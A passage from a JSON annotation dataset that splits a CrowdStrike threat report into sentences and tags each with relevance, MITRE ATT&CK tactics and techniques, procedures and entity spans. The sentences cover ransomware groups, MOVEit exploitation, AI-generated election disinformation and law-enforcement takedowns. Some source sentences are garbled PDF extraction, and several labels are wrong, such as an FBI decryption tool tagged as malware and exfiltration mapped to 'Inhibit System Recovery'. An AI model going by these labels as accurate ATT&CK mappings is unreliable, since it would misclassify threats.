generate deceptive but convincing narratives, adversaries will highly likely use such tools to conduct IO against elections in 2024.", "sentence_text": "Politically active partisans within thosecountries holding elections will also likely use generative » RUSSIA AND IRAN WILL LIKELY AI to create disinformation to disseminate within their LEVERAGE IO AGAINST THE U.S.\nown circles.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.007", "name": "Artificial Intelligence" } ], "procedure": "Used AI to create disinformation", "entities": [ { "text": "Politically active partisans", "start": 0, "end": 28, "label": "ThreatActor" }, { "text": "AI", "start": 131, "end": 133, "label": "MalwareTool" }, { "text": "create disinformation", "start": 137, "end": 158, "label": "Action" }, { "text": "disseminate ", "start": 162, "end": 174, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p37-s326-3a98a9", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 37, "sentence_id": 326, "context_before": "Politically active partisans within thosecountries holding elections will also likely use generative » RUSSIA AND IRAN WILL LIKELY AI to create disinformation to disseminate within their LEVERAGE IO AGAINST THE U.S.\nown circles.", "sentence_text": "AND THE EU, WHICH THEY CONSIDER MAJOR GEOPOLITICAL OPPONENTS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p37-s327-38a535", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 37, "sentence_id": 327, "context_before": "AND THE EU, WHICH THEY CONSIDER MAJOR GEOPOLITICAL OPPONENTS.", "sentence_text": "These issues were already observed within the first few weeks of 2024, as Chinese actors used AI-generated content in social media influence campaigns to disseminate content critical of Taiwan presidential election candidates.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.007", "name": "Artificial Intelligence" } ], "procedure": "Used AI to disseminate content", "entities": [ { "text": "Chinese actors", "start": 74, "end": 88, "label": "ThreatActor" }, { "text": "used AI-generated", "start": 89, "end": 106, "label": "Action" }, { "text": "disseminate ", "start": 154, "end": 166, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p37-s328-559912", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 37, "sentence_id": 328, "context_before": "These issues were already observed within the first few weeks of 2024, as Chinese actors used AI-generated content in social media influence campaigns to disseminate content critical of Taiwan presidential election candidates.", "sentence_text": "9 https://www.eastasiaforum.org/2024/01/06/military-influence-and-political-peril-in-pakistan/\n10 https://www.cambridge.org/core/journals/american-political-science-review/article/abs/partisan-polarization-is-the-primary-psychological-motivation-\nbehind-political-fake-news-sharing-on-twitter/3F7D2098CD87AE5501F7AD4A7FA83602\n11 https://www.theguardian.com/media/2023/dec/07/2024-elections-social-media-content-safety-policies-moderation", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p38-s329-203574", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 38, "sentence_id": 329, "context_before": "9 https://www.eastasiaforum.org/2024/01/06/military-influence-and-political-peril-in-pakistan/\n10 https://www.cambridge.org/core/journals/american-political-science-review/article/abs/partisan-polarization-is-the-primary-psychological-motivation-\nbehind-political-fake-news-sharing-on-twitter/3F7D2098CD87AE5501F7AD4A7FA83602\n11 https://www.theguardian.com/media/2023/dec/07/2024-elections-social-media-content-safety-policies-moderation", "sentence_text": "eCrime\nLandscape\nThe CrowdStrike eCrime Index® (ECX) tracks activity — including the number of observed spam emails and the average cost of buying access to a corporate network — across multiple eCrime ecosystem segments and calculates the total number of observed ransomware victims.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p38-s330-950193", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 38, "sentence_id": 330, "context_before": "eCrime\nLandscape\nThe CrowdStrike eCrime Index® (ECX) tracks activity — including the number of observed spam emails and the average cost of buying access to a corporate network — across multiple eCrime ecosystem segments and calculates the total number of observed ransomware victims.", "sentence_text": "Until May 2023, the ECX exhibited trends similar to those observed in 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p38-s331-62c372", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 38, "sentence_id": 331, "context_before": "Until May 2023, the ECX exhibited trends similar to those observed in 2022.", "sentence_text": "The most impactful contributors to these spikes included high BGH incident frequency and a sudden increase in observed DDoS +6% attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p38-s332-9a0635", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 38, "sentence_id": 332, "context_before": "The most impactful contributors to these spikes included high BGH incident frequency and a sudden increase in observed DDoS +6% attacks.", "sentence_text": "BGH Incidents Involving The ECX spiked again in November 2023, reflecting increases in spam email Data Leaks numbers and the rising average price for loaders and stealers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p39-s334-b97f4b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 39, "sentence_id": 334, "context_before": "OCT NOV DEC", "sentence_text": "The 2023 ECX tracked the most annual activity to date, representing the index’s year-over-year growth.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p39-s335-2994b0", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 39, "sentence_id": 335, "context_before": "The 2023 ECX tracked the most annual activity to date, representing the index’s year-over-year growth.", "sentence_text": "Spam emails likely decreased in 2023 as adversaries searched for other means of initial access and after a multinational operation shut down MALLARD SPIDER’s QakBot.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p39-s336-1f58f1", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 39, "sentence_id": 336, "context_before": "Spam emails likely decreased in 2023 as adversaries searched for other means of initial access and after a multinational operation shut down MALLARD SPIDER’s QakBot.", "sentence_text": "Though the average ransom demand was lower in 2023 than in 2022, this highly likely represents an outlier in the dataset and not an accurate view of the threat landscape.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p39-s337-a1a501", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 39, "sentence_id": 337, "context_before": "Though the average ransom demand was lower in 2023 than in 2022, this highly likely represents an outlier in the dataset and not an accurate view of the threat landscape.", "sentence_text": "Ransom demands have likely remained consistently high throughout this period, but the ability to track these values is becoming challenging due to threat actors and victims implementing stricter privacy measures around ransom price demands and payments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p39-s338-7432db", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 39, "sentence_id": 338, "context_before": "Ransom demands have likely remained consistently high throughout this period, but the ability to track these values is becoming challenging due to threat actors and victims implementing stricter privacy measures around ransom price demands and payments.", "sentence_text": "BIG GAME HUNTING 2023 BGH DLS Statistics", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p39-s340-7547cf", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 39, "sentence_id": 340, "context_before": "»", "sentence_text": "THE NUMBER OF VICTIMS NAMED Several factors contributed to this growth, including newly emerged BGH ON BGH DEDICATED LEAK SITES adversaries, growth of existing adversary operations and select high-volume INCREASED SIGNIFICANTLY IN campaigns such as multiple GRACEFUL SPIDER zero-day exploitations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p40-s341-ff103e", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 40, "sentence_id": 341, "context_before": "THE NUMBER OF VICTIMS NAMED Several factors contributed to this growth, including newly emerged BGH ON BGH DEDICATED LEAK SITES adversaries, growth of existing adversary operations and select high-volume INCREASED SIGNIFICANTLY IN campaigns such as multiple GRACEFUL SPIDER zero-day exploitations.", "sentence_text": "RECESS SPIDER and BRAIN SPIDER started their own ransomware operations in mid-2022 and January 2023, respectively.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Started ransomware operations", "entities": [ { "text": "RECESS SPIDER", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "BRAIN SPIDER", "start": 18, "end": 30, "label": "ThreatActor" }, { "text": "ransomware operations", "start": 49, "end": 70, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p40-s342-ce5c83", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 40, "sentence_id": 342, "context_before": "RECESS SPIDER and BRAIN SPIDER started their own ransomware operations in mid-2022 and January 2023, respectively.", "sentence_text": "They have since grown in prominence to account for the fourth (RECESS SPIDER) and fifth-highest (BRAIN SPIDER)\nnumber of DLS posts in 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p40-s343-a8650e", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 40, "sentence_id": 343, "context_before": "They have since grown in prominence to account for the fourth (RECESS SPIDER) and fifth-highest (BRAIN SPIDER)\nnumber of DLS posts in 2023.", "sentence_text": "GRACEFUL SPIDER — which has operated since 2016 and has typically conducted low-volume campaigns — exploited three zero-day vulnerabilities in 2023 to exfiltrate data from hundreds of victims across the globe.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1588.006", "name": "Vulnerabilities" } ], "procedure": "Exploited vulnerabilities to exfiltrate data", "entities": [ { "text": "GRACEFUL SPIDER", "start": 0, "end": 15, "label": "ThreatActor" }, { "text": "exploited three zero-day vulnerabilities", "start": 99, "end": 139, "label": "Action" }, { "text": "exfiltrate ", "start": 151, "end": 162, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p40-s344-4fcdc7", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 40, "sentence_id": 344, "context_before": "GRACEFUL SPIDER — which has operated since 2016 and has typically conducted low-volume campaigns — exploited three zero-day vulnerabilities in 2023 to exfiltrate data from hundreds of victims across the globe.", "sentence_text": "This adversary ultimately published the third-highest number of DLS posts in 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p40-s345-7be9d3", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 40, "sentence_id": 345, "context_before": "This adversary ultimately published the third-highest number of DLS posts in 2023.", "sentence_text": "Top Adversaries by DLS Post BITWISE ALPHA GRACEFUL RECESS BRAIN SPIDER SPIDER SPIDER SPIDER SPIDER SCATTERED SPIDER Adopts Ransomware as Primary Monetization Method SCATTERED SPIDER began using ALPHA SPIDER’s Alphv ransomware in April 2023.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Using Alphv ransomware", "entities": [ { "text": "Adopts Ransomware", "start": 116, "end": 133, "label": "Action" }, { "text": "using ", "start": 188, "end": 194, "label": "Action" }, { "text": "ALPHA SPIDER", "start": 194, "end": 206, "label": "ThreatActor" }, { "text": "Alphv ransomware", "start": 209, "end": 225, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p40-s346-9fa5c7", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 40, "sentence_id": 346, "context_before": "Top Adversaries by DLS Post BITWISE ALPHA GRACEFUL RECESS BRAIN SPIDER SPIDER SPIDER SPIDER SPIDER SCATTERED SPIDER Adopts Ransomware as Primary Monetization Method SCATTERED SPIDER began using ALPHA SPIDER’s Alphv ransomware in April 2023.", "sentence_text": "The adversary had previously monetized intrusions by selling victim data and SIM swaps as well as stealing cryptocurrency.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Sold victim data and SIM", "entities": [ { "text": "selling victim data and SIM swaps", "start": 53, "end": 86, "label": "Action" }, { "text": "stealing cryptocurrency", "start": 98, "end": 121, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p40-s347-ae06dd", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 40, "sentence_id": 347, "context_before": "The adversary had previously monetized intrusions by selling victim data and SIM swaps as well as stealing cryptocurrency.", "sentence_text": "Adopting ransomware as its primary means of extortion has shifted the scope of the adversary’s target profile: Most SCATTERED SPIDER victims in 2023 can be categorized as either reconnaissance targets or monetization targets.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Adopt ransomware as the primary means of extortion and categorize victims as reconnaissance or monetization targets.", "entities": [ { "text": "Adopting ransomware as its primary means of extortion", "start": 0, "end": 53, "label": "Action" }, { "text": "ransomware", "start": 9, "end": 19, "label": "MalwareTool" }, { "text": "adversary", "start": 83, "end": 92, "label": "ThreatActor" }, { "text": "SCATTERED SPIDER", "start": 116, "end": 132, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p40-s348-e11068", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 40, "sentence_id": 348, "context_before": "Adopting ransomware as its primary means of extortion has shifted the scope of the adversary’s target profile: Most SCATTERED SPIDER victims in 2023 can be categorized as either reconnaissance targets or monetization targets.", "sentence_text": "SCATTERED SPIDER uses intrusions into these entities’ networks to identify data that may prove useful in downstream, third-party monetization targeting.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" }, { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1592", "name": "Gather Victim Host Information" }, { "id": "T1584.008", "name": "Network Devices" } ], "procedure": "Intrusions into networks to identify data", "entities": [ { "text": "SCATTERED SPIDER", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "intrusions ", "start": 22, "end": 33, "label": "Action" }, { "text": "identify data", "start": 66, "end": 79, "label": "Action" }, { "text": "networks ", "start": 54, "end": 63, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p40-s349-cfefb0", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 40, "sentence_id": 349, "context_before": "SCATTERED SPIDER uses intrusions into these entities’ networks to identify data that may prove useful in downstream, third-party monetization targeting.", "sentence_text": "The adversary’s monetization target profile is considerably broader.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p40-s350-619e5b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 40, "sentence_id": 350, "context_before": "The adversary’s monetization target profile is considerably broader.", "sentence_text": "Most directly observed targets include high-revenue — often Fortune 500 — U.S.-based private sector entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p40-s351-b0703f", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 40, "sentence_id": 351, "context_before": "Most directly observed targets include high-revenue — often Fortune 500 — U.S.-based private sector entities.", "sentence_text": "A notable uptick in North American financial services victims occurred in the second half of 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p41-s352-ea1aa7", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 41, "sentence_id": 352, "context_before": "A notable uptick in North American financial services victims occurred in the second half of 2023.", "sentence_text": "Law Enforcement Activity Targets BGH Adversaries", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p41-s353-3dabc4", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 41, "sentence_id": 353, "context_before": "Law Enforcement Activity Targets BGH Adversaries", "sentence_text": "In 2023, various law enforcement agencies targeted BGH adversary operations and their supporting campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p41-s354-7f4f31", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 41, "sentence_id": 354, "context_before": "In 2023, various law enforcement agencies targeted BGH adversary operations and their supporting campaigns.", "sentence_text": "Their actions ranged from arresting suspected adversary personnel to technically disrupting adversary infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p41-s355-5d9df8", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 41, "sentence_id": 355, "context_before": "Their actions ranged from arresting suspected adversary personnel to technically disrupting adversary infrastructure.", "sentence_text": "JAN SeizureHive ransomwareof HIVE SPIDERdecryptioninfrastructurekeys and acquisition of Sanctions issued targeting members of WIZARD SPIDER FEB MAR Europolmembersannouncedof DOPPELtheSPIDERarrest of two suspected core JUN DOJBITWISEannouncedSPIDER theaffiliatearrest of a suspected AUG Seizureinfrastructureand shut down of MALLARD SPIDER’s QakBot Sanctions issued targeting members of WIZARD SPIDER SEP VIKING SPIDER DLS takedown and arrests OCT NOV Europolseveral ransomwareannounced theprogramsarrest of individuals connected to DEC SeizureAplhv ransomwareof ALPHA SPIDERdecryptioninfrastructurekeys and acquisition of", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p42-s356-1f5b54", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 42, "sentence_id": 356, "context_before": "JAN SeizureHive ransomwareof HIVE SPIDERdecryptioninfrastructurekeys and acquisition of Sanctions issued targeting members of WIZARD SPIDER FEB MAR Europolmembersannouncedof DOPPELtheSPIDERarrest of two suspected core JUN DOJBITWISEannouncedSPIDER theaffiliatearrest of a suspected AUG Seizureinfrastructureand shut down of MALLARD SPIDER’s QakBot Sanctions issued targeting members of WIZARD SPIDER SEP VIKING SPIDER DLS takedown and arrests OCT NOV Europolseveral ransomwareannounced theprogramsarrest of individuals connected to DEC SeizureAplhv ransomwareof ALPHA SPIDERdecryptioninfrastructurekeys and acquisition of", "sentence_text": "In January 2023, a coordinated international law enforcement operation resulted in the seizure of HIVE SPIDER infrastructure and acquisition of the Hive ransomware decryption key.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p42-s357-38dae0", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 42, "sentence_id": 357, "context_before": "In January 2023, a coordinated international law enforcement operation resulted in the seizure of HIVE SPIDER infrastructure and acquisition of the Hive ransomware decryption key.", "sentence_text": "The U.S. Department of Justice (DOJ) has reportedly maintained access to HIVE SPIDER’s internal infrastructure since July 2022 and has since provided decryption keys to more than 300 worldwide victims, preventing ransom payments totaling 130 million USD.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p42-s358-9fd4c9", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 42, "sentence_id": 358, "context_before": "The U.S. Department of Justice (DOJ) has reportedly maintained access to HIVE SPIDER’s internal infrastructure since July 2022 and has since provided decryption keys to more than 300 worldwide victims, preventing ransom payments totaling 130 million USD.", "sentence_text": "No HIVE SPIDER activity has been observed since January 2023; however, Hive affiliates have since migrated to other ransomware as a service (RaaS) operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p42-s359-4f86f1", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 42, "sentence_id": 359, "context_before": "No HIVE SPIDER activity has been observed since January 2023; however, Hive affiliates have since migrated to other ransomware as a service (RaaS) operations.", "sentence_text": "In March 2023, Europol announced the arrest of two suspected core DOPPEL SPIDER members.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p42-s360-b21f6c", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 42, "sentence_id": 360, "context_before": "In March 2023, Europol announced the arrest of two suspected core DOPPEL SPIDER members.", "sentence_text": "In June 2023, the DOJ announced the arrest of a suspected BITWISE SPIDER affiliate.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p42-s361-3456c6", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 42, "sentence_id": 361, "context_before": "In June 2023, the DOJ announced the arrest of a suspected BITWISE SPIDER affiliate.", "sentence_text": "WANDERING SPIDER also used MALLARD SPIDER’s QakBot.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "Used QakBot", "entities": [ { "text": "WANDERING SPIDER", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "MALLARD SPIDER", "start": 27, "end": 41, "label": "ThreatActor" }, { "text": "QakBot", "start": 44, "end": 50, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p42-s362-de565f", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 42, "sentence_id": 362, "context_before": "WANDERING SPIDER also used MALLARD SPIDER’s QakBot.", "sentence_text": "In October 2023, law enforcement agencies announced they had taken down VIKING SPIDER’s Ragnar Locker DLS and arrested a suspected Ragnar Locker developer.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p42-s363-03a302", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 42, "sentence_id": 363, "context_before": "In October 2023, law enforcement agencies announced they had taken down VIKING SPIDER’s Ragnar Locker DLS and arrested a suspected Ragnar Locker developer.", "sentence_text": "In November 2023, Europol also announced it had arrested personnel connected to an unnamed ransomware actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p42-s364-65a9a2", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 42, "sentence_id": 364, "context_before": "In November 2023, Europol also announced it had arrested personnel connected to an unnamed ransomware actor.", "sentence_text": "The FBI offered an Alphv decryption tool to more than 500 ALPHA SPIDER victims, prompting ALPHA SPIDER to migrate its DLS and affiliate panel to new Tor sites while it attempted to regain control of its compromised infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.006", "name": "Acquire Infrastructure: Web Services" } ], "procedure": "Migrate DLS and affiliate panel infrastructure to new Tor sites and attempt to regain control of compromised infrastructure.", "entities": [ { "text": "Alphv decryption tool", "start": 19, "end": 40, "label": "MalwareTool" }, { "text": "ALPHA SPIDER", "start": 58, "end": 70, "label": "ThreatActor" }, { "text": "ALPHA SPIDER", "start": 90, "end": 102, "label": "ThreatActor" }, { "text": "migrate its DLS and affiliate panel to new Tor sites", "start": 106, "end": 158, "label": "Action" }, { "text": "DLS", "start": 118, "end": 121, "label": "Infrastructure_Indicator" }, { "text": "affiliate panel", "start": 126, "end": 141, "label": "Infrastructure_Indicator" }, { "text": "new Tor sites", "start": 145, "end": 158, "label": "Infrastructure_Indicator" }, { "text": "attempted to regain control of its compromised infrastructure", "start": 168, "end": 229, "label": "Action" }, { "text": "compromised infrastructure", "start": 203, "end": 229, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p42-s365-e16ce3", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 42, "sentence_id": 365, "context_before": "The FBI offered an Alphv decryption tool to more than 500 ALPHA SPIDER victims, prompting ALPHA SPIDER to migrate its DLS and affiliate panel to new Tor sites while it attempted to regain control of its compromised infrastructure.", "sentence_text": "ALPHA SPIDER then removed targeting restrictions from affiliates, excepting prohibition against targeting entities within the Commonwealth of Independent States.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p43-s366-6d1d1c", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 43, "sentence_id": 366, "context_before": "ALPHA SPIDER then removed targeting restrictions from affiliates, excepting prohibition against targeting entities within the Commonwealth of Independent States.", "sentence_text": "Data Theft and Extortion Optimization Since 2019, BGH adversaries have threatened to publish stolen data on DLSs as a secondary extortion means in concert with deploying ransomware.12 In 2023, adversaries continued to invent exploitation methods to steal victim data and increase pressure on victims, with many — including GRACEFUL SPIDER and MASKED SPIDER — adopting data theft as their sole means of extortion.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Threatened to publish stolen data and deploying ransomware", "entities": [ { "text": "BGH adversaries", "start": 50, "end": 65, "label": "ThreatActor" }, { "text": "threatened to publish stolen data", "start": 71, "end": 104, "label": "Action" }, { "text": "DLSs ", "start": 108, "end": 113, "label": "Infrastructure_Indicator" }, { "text": "deploying ransomware", "start": 160, "end": 180, "label": "Action" }, { "text": "invent exploitation methods", "start": 218, "end": 245, "label": "Action" }, { "text": "steal ", "start": 249, "end": 255, "label": "Action" }, { "text": "GRACEFUL SPIDER", "start": 323, "end": 338, "label": "ThreatActor" }, { "text": "MASKED SPIDER", "start": 343, "end": 356, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p43-s367-78c489", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 43, "sentence_id": 367, "context_before": "Data Theft and Extortion Optimization Since 2019, BGH adversaries have threatened to publish stolen data on DLSs as a secondary extortion means in concert with deploying ransomware.12 In 2023, adversaries continued to invent exploitation methods to steal victim data and increase pressure on victims, with many — including GRACEFUL SPIDER and MASKED SPIDER — adopting data theft as their sole means of extortion.", "sentence_text": "GRACEFUL SPIDER was the most prolific data theft and extortion actor in 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p43-s368-e826c1", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 43, "sentence_id": 368, "context_before": "GRACEFUL SPIDER was the most prolific data theft and extortion actor in 2023.", "sentence_text": "The adversary exploited zero-day vulnerabilities in file-transfer applications GoAnywhere Managed File Transfer and MOVEit Transfer as well as IT management software SysAid On-Premise.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1588.006", "name": "Vulnerabilities" } ], "procedure": "Exploited vulnerabilities in file-transfer applications", "entities": [ { "text": "exploited zero-day vulnerabilities", "start": 14, "end": 48, "label": "Action" }, { "text": "file-transfer applications", "start": 52, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "GoAnywhere ", "start": 79, "end": 90, "label": "Infrastructure_Indicator" }, { "text": "MOVEit ", "start": 116, "end": 123, "label": "Infrastructure_Indicator" }, { "text": "IT management software SysAid", "start": 143, "end": 172, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p43-s369-d3fa4b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 43, "sentence_id": 369, "context_before": "The adversary exploited zero-day vulnerabilities in file-transfer applications GoAnywhere Managed File Transfer and MOVEit Transfer as well as IT management software SysAid On-Premise.", "sentence_text": "GRACEFUL SPIDER’s Clop ransomware deployment within the scope of these campaigns was not observed, although the adversary exfiltrated and published data to its DLS that belonged to more than 380 victim organizations.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1567.003", "name": "Exfiltration to Text Storage Sites" } ], "procedure": "Exfiltrated and published data", "entities": [ { "text": "GRACEFUL SPIDER", "start": 0, "end": 15, "label": "ThreatActor" }, { "text": "ransomware deployment", "start": 23, "end": 44, "label": "Action" }, { "text": "exfiltrated ", "start": 122, "end": 134, "label": "Action" }, { "text": "published data to its DLS", "start": 138, "end": 163, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p43-s370-21fe72", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 43, "sentence_id": 370, "context_before": "GRACEFUL SPIDER’s Clop ransomware deployment within the scope of these campaigns was not observed, although the adversary exfiltrated and published data to its DLS that belonged to more than 380 victim organizations.", "sentence_text": "BGH adversaries have historically and indiscriminately exfiltrated and published stolen victim data.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1567", "name": "Exfiltration Over Web Service" }, { "id": "T1490", "name": "Inhibit System Recovery" } ], "procedure": "BGH adversaries exfiltrate and publish stolen victim data as part of their operations.", "entities": [ { "text": "BGH adversaries", "start": 0, "end": 15, "label": "ThreatActor" }, { "text": "have historically and indiscriminately exfiltrated", "start": 16, "end": 66, "label": "Action" }, { "text": "published stolen victim data", "start": 71, "end": 99, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p43-s371-c68c2e", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 43, "sentence_id": 371, "context_before": "BGH adversaries have historically and indiscriminately exfiltrated and published stolen victim data.", 